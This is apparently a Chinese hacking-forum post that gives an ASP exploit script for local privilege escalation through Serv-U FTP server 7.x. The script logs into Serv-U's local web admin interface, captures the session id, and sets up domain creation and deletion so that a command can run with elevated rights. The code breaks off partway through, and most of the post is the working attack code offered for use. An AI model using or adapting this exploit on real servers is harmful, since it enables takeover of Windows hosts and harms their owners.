本地提权 支持serv-u 7.x的asp版
思路是沿用空虚浪子心的提权方法,由于asp不支持操作socket,只能采用新建域再删除.程序界面是抄袭陆大的serv-u 6.X回显程序的,嘿嘿.由于本人菜,找不出serv-u 7.0的userid究竟是怎么变化的,所以只删除了域......serv-u 7.4连不上的原因找出来了,原来是7.0以上的版本新增加了域之后会延迟一段时间才启动.原来的exp可以正常使用.为了大家方便,在上面添了一句话,重新奉上.
EXP:
<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
Function httpopen(neirong,fangshi,dizhi,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi,dizhi,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length",len(neirong)
Http.setrequestheader "User-Agent","Serv-U"
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie<>"" then
Http.setrequestheader "Cookie",cookie
End If
Http.send neirong
httpopen=bytes2BSTR(Http.responseBody)
set Http=nothing
end Function
Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”"
End If
end Function
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
<%
’----------自定义参数开始-----------
action=Request("action")
loginpass=Request.Form("loginpass")
port=Request("port")
mydomain=Request.Form("mydomain")
path=Request.Form("path")
ftpport = Request.Form("ftpport")
user=Request.Form("user")
pass=Request.Form("pass")
cmd= Request.Form("cmd")
sessionid=Request("sessionid")
OrganizationId=Request("OrganizationId")
userid=Request("userid")
domainid=Request("domainid")
’----------自定义参数结束-----------
select case action
case 1
returns=httpopen("user=&pword="&loginpass&"&language=zh%2CCN%26","POST","http://127.0.0.1:"&port&"/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543","http://127.0.0.1:"&port&"/?Session=39893&Language=zh,CN&LocalAdmin=1","")
sessionid=getmidstr("<sessionid>","</sessionid>",returns)
if sessionid<>"" then
Response.Write "login ok!"&"</br>"
Response.redirect "?action=2&sessionid="&sessionid&"&port="&port
else
Response.Write "error!"&"</br>"
end if
case 2
call main2()
case 3
returns=httpopen("","POST","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1","",sessionid)
OrganizationIdTemp=mid(returns,instr(returns,"OrganizationUsers.xml&ID="),len("OrganizationUsers.xml&ID=")+15)
OrganizationId=mid(OrganizationIdTemp,instr(OrganizationIdTemp,"=")+1,instr(OrganizationIdTemp,"""")-instr(OrganizationIdTemp,"=")-1)
页:
[1]